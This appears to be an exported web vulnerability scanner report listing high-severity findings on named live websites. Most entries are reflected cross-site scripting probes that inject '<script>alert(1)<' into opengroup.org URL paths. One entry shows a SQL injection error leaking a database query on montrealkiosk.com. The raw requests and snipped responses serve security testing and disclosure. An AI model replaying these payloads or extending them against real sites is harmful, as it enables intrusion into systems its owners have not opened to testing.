| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=56tm98dg8f Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32744 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.business |
| Path: | /top-10-web-content |
| GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=cbc0c1flt6 Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.business |
| Path: | /top-10-web-content |
| GET /top-10-web-content Host: www.business-software.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3) Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: PHPSESSID=3csq33e05p Vary: User-Agent,Accept Content-Type: text/html Content-Length: 32741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <head> <meta http-equiv="C ...[SNIP]... <form method="post" id="RegistrationQForm" action="/top-10-web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.linkedin.com |
| Path: | /cws/share-count |
| GET /cws/share-count?url=http Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://www.project Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/ Set-Cookie: bcookie="v=1&b9beeacf Vary: Accept-Encoding Content-Type: text/javascript;charset Content-Language: en-US Date: Sun, 27 Feb 2011 02:20:33 GMT Content-Length: 151 IN.Tags.Share.handleCount |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.montrealkiosk |
| Path: | /directory.php |
| GET /directory.php?name=Arts Host: www.montrealkiosk.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 01:03:11 GMT Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.9 Content-Type: text/html Content-Length: 1324 mysql error: [1054: Unknown column '6a82d' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 6a82d<a>71b105b97ac ORDER BY name ASC") <pre align=left> & ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture71102--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:11 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4270 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture71102--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architectureca5d0<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:08 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4262 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc14af3<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:28 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4264 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-docb5ef6--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:31 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4270 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-docb5ef6--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:50 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4264 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:56 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 4270 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture5a499<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:26 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architectureb1689--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:29 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architectureb1689--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture80c52"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:23 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture80c52"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doccd353--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:55 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doccd353--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-docc907b"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:42 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc3fff9<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:50 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:07 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:05 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:19 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:22 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:17 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5252 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architectureb44de--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:29 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architectureb44de--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture3e36c"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:23 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture3e36c"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture11be1<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:24 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5240 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc9e1f5--><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:55 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc9e1f5--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doca7e1c<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:50 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5240 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc21311"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:42 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5243 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/architecture ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:07 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5237 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
| GET /architecture/togaf8-doc Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /architecture/togaf8-doc ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /architecture/togaf8-doc |
